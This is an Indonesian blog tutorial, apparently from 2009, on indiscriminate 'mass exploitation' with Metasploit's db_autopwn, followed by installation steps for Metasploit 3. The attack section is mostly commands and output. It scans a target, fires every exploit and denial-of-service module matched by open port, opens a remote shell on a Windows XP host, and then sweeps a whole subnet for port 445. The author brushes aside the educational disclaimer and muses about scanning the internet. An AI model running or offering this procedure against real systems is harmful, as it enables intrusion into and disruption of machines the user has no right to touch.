Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :

$ sudo msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|
       =[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 132 aux

- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)

msf > load db_mysql

[*] Successfully loaded plugin: db_mysql

- Sambungkan metasploit dengan database di MySQL

msf > db_connect msf:msf@localhost/metasploit
msf >

- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.

msf > db_nmap -v -sS 192.168.1.10

[*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT      STATE SERVICE
NMAP: 135/tcp   open  msrpc
NMAP: 139/tcp   open  netbios-ssn
NMAP: 445/tcp   open  microsoft-ds
NMAP: 1025/tcp  open  NFS-or-IIS
NMAP: 1026/tcp  open  LSA-or-nterm
NMAP: 1043/tcp  open  boinc
NMAP: 1433/tcp  open  ms-sql-s
NMAP: 1521/tcp  open  oracle
NMAP: 1723/tcp  open  pptp
NMAP: 3372/tcp  open  msdtc
NMAP: 3389/tcp  open  ms-term-serv
NMAP: 12345/tcp open  netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >

- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan

msf > db_autopwn -h

[*] Usage: db_autopwn [options]
	-h          Display this help text
	-t          Show all matching exploit modules
	-x          Select modules based on vulnerability references
	-p          Select modules based on open ports
	-e          Launch exploits against all matched targets
	-r          Use a reverse connect shell
	-b          Use a bind shell on a random port
	-q          Disbale exploit module output
	-I  [range] Only exploit hosts inside this range
	-X  [range] Always exclude hosts inside this range
	-PI [range] Only exploit hosts with these ports open
	-PX [range] Always exclude hosts with these ports open
	-m  [regex] Only run modules whose name matches the regex
msf >

- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database

msf > db_autopwn -p -t

[*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Lakukan exploitasi system dengan menambahkan opsi -e :

msf > db_autopwn -p -t -e

[*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.

msf > sessions -l

Active sessions
===============
  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.6:46451 -> 192.168.1.10:29595

- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.10
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Owned… !!

Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :

msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24

[*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >

Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.

Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri..
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install

Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.

Sumber, kredit, dan tautan terkait :
- http://www.kecoak-elektronik.net
- http://blog.metasploit.com

Sebenarnya saya udah agak lama nggak coba-coba metasploit lagi, waktu itu saya menggunakan metasploit 2 yang pada saat itu ditulis menggunakan Perl. Tetapi setelah versi 3, ternyata metasploit ditulis menggunakan ruby. Saya kurang tahu kenapa metasploit berubah haluan milih ruby karena saya hanya seorang pengguna saja hehe.. Saya singgung sedikit soal ruby di metasploit supaya temen-temen yang mau nyoba biar ndak salah kaprah seperti saya hahaha… Awalnya sehabis download mfs maen install saja dan mendapati berbagai macam error ( pada saat tulisan ini dibuat versi terbaru yang dipublish di websitenya adalah metasploit 3.2) kemudian setelah tanya sana-sini ternyata butuh ruby interpreter. Taunya ya dari situ kalo metasploit 3 ‘”diketik” pake ruby ) Dalam artikel ini saya tidak menggunakan file tarball tapi menggunakan subversion (svn). Instalasi metasploit ini lumayan membingungkan terutama untuk orang yang masih awam dengan Ruby (seperti saya), tapi sisi positifnya kita jadi sedikit tahu mengenai ruby. Kalo anda tidak ingin ribet melakukan instalasi seperti ini, disarankan menggunakan BackTrack.

Sebelum melakukan instalasi hapus paket rubygems terlebih dahulu apabila sudah terinstall di sistem. Paket rubygems disarankan install manual karena ketika install menggunakan repository, saya mendapatkan beberapa masalah. Kemudian saya coba install manual bisa bekerja dengan baik.

sudo apt-get autoremove rubygems

Kemudian instal paket-paket dan library yang dibutuhkan :

sudo apt-get install irb subversion ri ri1.8 libmysqlclient15-dev build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby ruby1.8-dev libiconv-ruby nmap

Notes : untuk automated exploit saya menggunakan database mysql karena sudah terinstall sebelumnya. Database yang telah disupport yaitu mysql, postgre, dan sqllite

Kalo pengen menggunakan metasploit gui harus menambah dengan paket ini :

sudo apt-get install libgtk2-ruby libglade2-ruby

Kemudian download dan install rubygems beserta modul yang diperlukan :

wget -c http://rubyforge.org/frs/download.php/45905/rubygems-1.3.1.tgz

tar xvzf rubygems-1.3.1.tgz

cd rubygems-1.3.1

sudo ruby setup.rb

sudo ln -s /usr/bin/gem1.8 /usr/bin/gem

sudo gem install rack

sudo gem install activerecord

sudo gem install rake

sudo gem install rails –include-dependencies

sudo gem install mysql

sudo gem update –system

Instalasi metasploit :

cd /opt

sudo svn co http://metasploit.com/svn/framework3/trunk/ metasploit

cd metasploit

sudo svn up

Supaya mudah penggunaanya, buat simbolic link executable file metasploit :

cd /usr/local/bin

sudo ln -s /opt/metasploit/msfcli msfcli

sudo ln -s /opt/metasploit/msfconsole msfconsole

sudo ln -s /opt/metasploit/msfd msfd

sudo ln -s /opt/metasploit/msfelfscan msfelfscan

sudo ln -s /opt/metasploit/msfencode msfencode

sudo ln -s /opt/metasploit/msfgui msfgui

sudo ln -s /opt/metasploit/msfmachscan msfmachscan

sudo ln -s /opt/metasploit/msfopcode msfopcode

sudo ln -s /opt/metasploit/msfpayload msfpayload

sudo ln -s /opt/metasploit/msfpescan msfpescan

sudo ln -s /opt/metasploit/msfrpc msfrpc

sudo ln -s /opt/metasploit/msfrpcd msfrpcd

sudo ln -s /opt/metasploit/msfweb msfweb

Instalasi sudah selesai. Sekarang kita tes hasil instalasi :

Restart terlebih dahulu service mysql :

sudo /etc/init.d/mysql restart

Sekarang kita tes juga driver mysql apakah sudah terinstegrasi dengan ruby-nya :

sinchan@cluster1:~$ ruby -e ‘require “rubygems”; require “mysql”;’

sinchan@cluster1:~$

Seharusnya ketika eksekusi perintah diatas tidak muncul pesan apa-apa. Apabila muncul error kemungkinan ada dependency library atau modul yang belum terinstall.

Test instalasi rails :

rails test-rony

cd test-rony/script/

./server

Sekarang buka browser anda dan ketik http://localhost:3000. Seharusnya anda akan melihat web page dengan tulisan sepert ini :

Langkah selanjutnya yaitu membuat user dan database di mysql :

sinchan@cluster1:~$ mysql -u root -p mysql

mysql> CREATE DATABASE metasploit;

mysql> GRANT ALL ON metasploit.* TO msf@localhost IDENTIFIED BY ‘msf’;

Sekarang silahkan coba untuk menggunakan metasploit. Untuk yang metasploit console ketik : msfconsole, . Seperti gambar dibawah ini :

Untuk metasploit GUI : ketik msfgui :

Untuk metasploit via web, ketik : sudo msfweb :

Kemudian buka web browser, dan masukkan url : http://localhost:55555, sehingga keluar tampilan seperti ini :

Kemudian buat schema database di mysql menggunakan metasploit. Sebenarnya schema database ini bisa dibuat manual. File scriptnya yaitu mysql.sql di folder data/sql. Tapi dalam artikel ini eksekusinya dilakukan menggunakan metasploit.

sinchan@cluster1:/opt/metasploit$ msfconsole

msf > load db_mysql

[*] Successfully loaded plugin: db_mysql

msf > db_create msf:msf@localhost/metasploit

[*] Database creation complete (check for errors)

Akhirnya selesai juga……….. instalasi sudah selesai, silahkan dicoba-coba sendiri terutama magical db_autopwn-nya

Sumber :
- http://www.metasploit.com
- http://www.rubygems.org